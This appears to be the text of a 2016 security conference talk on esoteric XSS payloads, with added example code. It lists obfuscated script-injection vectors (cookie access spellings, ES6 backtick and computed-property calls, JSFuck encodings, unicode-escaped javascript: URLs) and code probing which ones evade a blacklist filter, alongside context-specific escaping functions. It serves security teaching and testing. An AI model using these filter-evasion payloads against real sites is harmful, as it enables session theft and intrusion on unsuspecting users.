ESOTERIC XSS PAYLOADS
c0c0n 2016
@riyazwalikar @wincmdfu

RIYAZ WALIKAR
Chief Offensive Security Officer @Appsecco
Security evangelist, leader for null Bangalore and OWASP chapters
Trainer/Speaker: Black Hat, DEF CON, nullcon, c0c0n, OWASP AppSec USA
Twitter: @riyazwalikar and @wincmdfu
http://ibreak.software

WHAT IS THIS TALK ABOUT?
Quick contexts
Uncommon XSS vectors

WHAT ARE INJECTION CONTEXTS?

"Just like the word 'date' could mean a fruit, a point in time or a romantic meeting based on the context in which it appears, the impact that user input appearing in the page would have depends on the context in which the browser tries to interpret that input."

    Lavakumar Kuppan, IronWASP

MOST COMMON INJECTION CONTEXTS
HTML context
HTML Element context
Script context

HTML CONTEXT

Welcome user_tainted_input!

HTML ELEMENT CONTEXT

Welcome bob!

SCRIPT CONTEXT

Welcome bob!
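The three contexts above decide which characters matter and which encoder neutralises them. The following is an added example, not markup or code from the talk: it renders one constructed tainted value into each context with an assumed page template, and shows the classic script-context mistake. "HTML Element context" is taken here to mean the input landing inside a quoted attribute value; the templates, function names and sample input are assumptions.

```javascript
// Added example (not from the slides): one tainted value in the three contexts
// above, with the encoding each context needs. Page templates are assumed.

// Constructed sample input: a name that tries to break out of its context.
const TAINTED = '"><img src=x onerror=alert(1)>';

// HTML context: input is text between tags. Entity-encode the five characters
// the HTML tokenizer cares about; "<" can then no longer open a tag.
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}
function renderHtmlContext(name) {
  return `<div>Welcome ${escapeHtml(name)}!</div>`;
}

// HTML element (attribute value) context: the same encoder is enough ONLY when
// the attribute is quoted; an unquoted attribute value ends at the first space.
function renderAttrContext(name) {
  return `<input value="Welcome ${escapeHtml(name)}!">`;
}

// Script context, naive version: backslash-escaping quotes keeps the JS string
// literal intact, but the HTML tokenizer finds </script> before the JS parser
// ever runs, so a closing tag inside the value terminates the script block.
function renderScriptContextNaive(name) {
  const jsStr = name.replace(/\\/g, '\\\\').replace(/"/g, '\\"');
  return `<script>var greeting = "Welcome ${jsStr}!";</script>`;
}

// Script context, hardened: hex/unicode-escape everything outside [A-Za-z0-9 ],
// so no quote, backslash, "<", "/" or newline reaches the page as itself.
function escapeJsString(s) {
  return s.replace(/[^A-Za-z0-9 ]/g, c => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}
function renderScriptContext(name) {
  return `<script>var greeting = "Welcome ${escapeJsString(name)}!";</script>`;
}

// The escapes must round-trip: the JS engine decodes them back to the original.
function decodeJsString(escaped) {
  return new Function(`return "${escaped}";`)();
}

// Same attacker, three contexts: where the payload survives and where it dies.
function demo(name = TAINTED) {
  const closer = '</script><script>alert(1)</script>';  // constructed script-context input
  return {
    html: renderHtmlContext(name),
    attr: renderAttrContext(name),
    scriptNaive: renderScriptContextNaive(closer),
    script: renderScriptContext(closer),
  };
}
```

Calling demo() shows the HTML and attribute renderings with the tag turned into `&lt;img ...&gt;`, the naive script rendering with a live `</script><script>alert(1)</script>` inside it, and the hardened rendering with `\x3c\x2fscript\x3e` in its place.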

Common vectors?

Multiple ways of representation

document.cookie
document['cookie']
document['coo'+'kie']
eval('doc'+'ument')['coo'+'kie']

Autoscrolling the page

...
New HTML Elements

Using the CDATA section inside SVG

><image xlink:href="

Using DATA URIs

Using the embed tag

Overwriting the ReferenceError object

ES6 Computed properties

({[alert(1)]: 1})

({[eval('ale'+'rt')(0)]: 1 })

Back ticks FTW! No enclosing required:

alert `1`
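Every spelling on the "Multiple ways of representation" slide reads the same cookie, and every form on the ES6 slides calls the same alert; what changes is only the text a blacklist gets to match. The block below is an added example, not from the talk, that runs the cookie spellings above, the computed-property and backtick forms, and the \u{61} identifier escape shown on the next slide, against a WAF-style regex. The regex, the stand-in `document` and the recording `alert` are assumptions made so it runs under Node rather than in a browser.

```javascript
// Added example (not from the slides): the same semantics in several spellings,
// and which of them a blacklist regex actually sees.

globalThis.document = { cookie: 'session=deadbeef' };        // constructed stand-in
const alertCalls = [];
globalThis.alert = (x) => { alertCalls.push(x); return x; }; // recording stand-in

// A WAF-style blacklist that looks for the spellings it expects.
const BLACKLIST = /document\.cookie|alert\s*\(/i;

// Cookie reads, from the "Multiple ways of representation" slide.
const COOKIE_VARIANTS = [
  'document.cookie',
  "document['cookie']",
  "document['coo'+'kie']",
  "eval('doc'+'ument')['coo'+'kie']",
];

// alert() calls, from the ES6 slides. ({[expr]: 1}) evaluates expr as the key,
// so the call runs while the object literal is built; alert`1` is a tagged
// template, calling alert with the strings array ["1"] (no parentheses in the
// source); \u{61} inside an identifier is just the letter a to the parser.
const ALERT_VARIANTS = [
  'alert(1)',
  '({[alert(1)]: 1})',
  "({[eval('ale'+'rt')(1)]: 1})",
  'alert`1`',
  '\\u{61}lert`1`',
];

// Run one spelling the way an injected script would: indirect eval, global scope.
function evaluate(src) {
  return (0, eval)(src);
}

// For each cookie spelling: did the blacklist match, and did the read succeed?
function probeCookieVariants() {
  return COOKIE_VARIANTS.map(src => ({
    src,
    blocked: BLACKLIST.test(src),
    leaked: evaluate(src) === document.cookie,
  }));
}

// For each alert spelling: did the blacklist match, and did alert fire?
// Note that the bare computed-property form still contains "alert(" and is
// caught; only combined with the concatenated eval does it slip past.
function probeAlertVariants() {
  return ALERT_VARIANTS.map(src => {
    const before = alertCalls.length;
    evaluate(src);
    return {
      src,
      blocked: BLACKLIST.test(src),
      fired: alertCalls.length === before + 1,
      arg: alertCalls[before], // ["1"] for the tagged-template forms; String() gives "1"
    };
  });
}
```

In a browser the tagged-template forms pop a dialog showing "1" because alert() stringifies the array it receives; the slide's `loc\u{61}tion=j\u{61}vascript:alert`1`` uses the same identifier escape on `location`, which has no stand-in here.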

Expansion of \u{61} and backticks

loc\u{61}tion=j\u{61}vascript:alert`1`

Prototyping the .toString() method

Object.prototype[Symbol.toStringTag]=''; location=':1+{}'

JSFUCK

JSFuck is an esoteric and educational programming style based on the atomic parts of JavaScript. It uses only six different characters to write and execute code: ()+[]!

false     => ![]
true      => !![]
undefined => [][[]]
NaN       => +[![]]
0         => +[]
1         => +!+[]
2         => !+[]+!+[]
10        => [+!+[]]+[+[]]
Array     => []
Number    => +[]
String    => []+[]
Boolean   => ![]
Function  => []["filter"]
eval      => []["filter"]["constructor"]( CODE )()
window    => []["filter"]["constructor"]("return this")()

alert(0)

(![]+[])[1]+(![]+[])[2]+(![]+[])[4]+(!![]+[])[1]+(!![]+[])[0]+"(0)"
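The payload above picks letters out of "false" and "true" by index. The block below is an added example, not from the talk or from jsfuck.com, that turns that manual process into a small encoder built only from the atoms in the table: any character found in "false", "true", "undefined" or "NaN", plus the digits, is encoded; anything else is left as a quoted literal, exactly as the slide's own payload does with "(0)". Full JSFuck reaches those remaining characters through stringified native functions, which is not covered here. The recording `alert` and the function names are assumptions so the block runs under Node.

```javascript
// Added example (not from the slides or jsfuck.com): a partial JSFuck encoder
// using the atoms listed above, plus the []["filter"]["constructor"] eval atom.

const alertCalls = [];
globalThis.alert = (x) => { alertCalls.push(x); };   // stand-in, not a browser API

// Source expressions that evaluate to strings, paired with the string produced.
const WORDS = [
  ['![]+[]',    'false'],
  ['!![]+[]',   'true'],
  ['[][[]]+[]', 'undefined'],
  ['+[![]]+[]', 'NaN'],
];

// Numbers: 0 is +[], 1 is +!+[], n >= 2 is n copies of true (!+[]) added together.
function jsfuckNumber(n) {
  if (n === 0) return '+[]';
  if (n === 1) return '+!+[]';
  return Array(n).fill('!+[]').join('+');
}

// One character as an expression that evaluates to a one-character string,
// or null when the character is outside the alphabet these atoms reach.
function jsfuckChar(ch) {
  if (/^[0-9]$/.test(ch)) return `([${jsfuckNumber(Number(ch))}]+[])`; // [n]+[] -> "n"
  for (const [expr, word] of WORDS) {
    const i = word.indexOf(ch);
    if (i !== -1) return `(${expr})[${jsfuckNumber(i)}]`;           // e.g. "false"[1] -> "a"
  }
  return null;
}

// A whole string as a concatenation of per-character expressions. Characters we
// cannot reach are emitted as quoted literals, as the slide does with "(0)".
function jsfuckString(s) {
  return Array.from(s, ch => {
    const enc = jsfuckChar(ch);
    return enc === null ? JSON.stringify(ch) : enc;
  }).join('+');
}

// True when an expression is pure JSFuck: only the six characters ()+[]!.
function usesOnlyAtoms(expr) {
  return /^[()+\[\]!]*$/.test(expr);
}

// The slide's eval atom: Function(code)() reached via Array.prototype.filter.
// (The letters of "filter" are themselves all reachable from the words above;
// "constructor" is not, which is why full JSFuck needs native-code strings.)
function runViaFilterConstructor(code) {
  return []["filter"]["constructor"](code)();
}

// Encode a snippet, evaluate the encoding back into source text, run that.
function demo(code = 'alert(0)') {
  const encoded = jsfuckString(code);
  const decoded = (0, eval)(encoded);          // the expression yields the string
  const before = alertCalls.length;
  runViaFilterConstructor(decoded);
  return { encoded, decoded, fired: alertCalls.length === before + 1, arg: alertCalls[before] };
}
```

demo() produces the same shape as the slide's payload, with "(" and ")" still quoted; jsfuckString('undefined') comes out in the six characters alone.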

The ES6 specification, coupled with new HTML5 elements and event handlers, can be used to bypass most blacklist-based web application firewalls. A lot of active research has been done in this area by @0x6D6172696F and the good folks at Cure53.

Q & A
http://ibreak.software
@riyazwalikar @wincmdfu

REFERENCES
http://blog.ironwasp.org/2014/07/contexts-and-cross-site-scripting-brief.html
https://github.com/riyazwalikar/simplexssapp
https://html5sec.org/
http://www.jsfuck.com/
http://blog.innerht.ml/cascading-style-scripting
https://cure53.de/es6-for-penetration-testers.pdf